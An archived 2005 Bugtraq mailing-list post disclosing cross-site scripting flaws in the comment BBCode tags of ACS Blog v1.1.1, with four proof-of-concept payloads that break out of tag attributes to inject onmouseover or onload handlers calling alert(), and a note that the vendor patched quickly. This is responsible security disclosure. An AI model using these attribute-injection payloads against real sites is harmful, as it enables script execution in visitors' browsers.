[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Multiple XSS vulnerabilities in ACS Blog
From:       Dan Crowley <dan.crowley () gmail ! com>
Date:       2005-03-28 23:15:34
Message-ID: bc0c5dbd05032815152f763360 () mail ! gmail ! com
[Download RAW message or body]

These vulnerabilities have been tested on the latest version of ACS
Blog. (v1.1.1)

In the comments section of ACS Blog, it is possible to execute an XSS
attack through the [link], [mail], and [img] tags, due to lack of
filtering of single quotes and spaces inside the tags.

Examples/PoCs:

[link=http://www.google.com' onmouseover='alert("XSS vulnerability")'
o=']Don't you wanna see where this link goes?[/link]

[mail=bugtraq@securityfocus.com' onmouseover='alert("XSS
vulnerability")' o=']Mr. Wiggles[/mail]

[img]http://www.example.com/image.jpg' onload='alert("XSS
vulnerability")' o='[/img]

[link=http://www.google.com target=_blank'
onmouseover=a=/Vulnerability/;alert(a.source) o=']Hooray[/link]

----------
Vendor responded within 2 hours of notification, notified users with
the security alert on its main page, and patched the vulnerabilities
within another couple of hours.
----------

Cheers,
Dan
[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic